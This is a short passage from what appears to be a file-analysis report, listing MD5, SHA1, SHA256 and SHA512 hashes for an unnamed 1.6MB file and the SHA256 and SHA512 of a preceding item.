  SHA256: dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
  SHA512: aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

1.6MB (path not shown)
  MD5: 08e3930a42197a422d064569c4778997
  SHA1: 74832aa332b48422e5d448f5099b397e84c18712
  SHA256: 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
  SHA512: b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368